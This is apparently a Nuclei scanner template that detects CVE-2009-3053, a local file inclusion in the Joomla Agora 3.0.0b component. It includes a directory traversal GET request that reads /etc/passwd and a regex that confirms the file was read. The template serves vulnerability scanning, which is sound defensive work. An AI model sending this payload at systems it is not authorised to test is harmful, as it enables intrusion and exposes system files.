32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: CVE-2009-3053
|
|
|
|
info:
|
|
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/9564
|
|
- https://www.cvedetails.com/cve/CVE-2009-3053
|
|
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
|
classification:
|
|
cve-id: CVE-2009-3053
|
|
tags: cve,cve2009,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|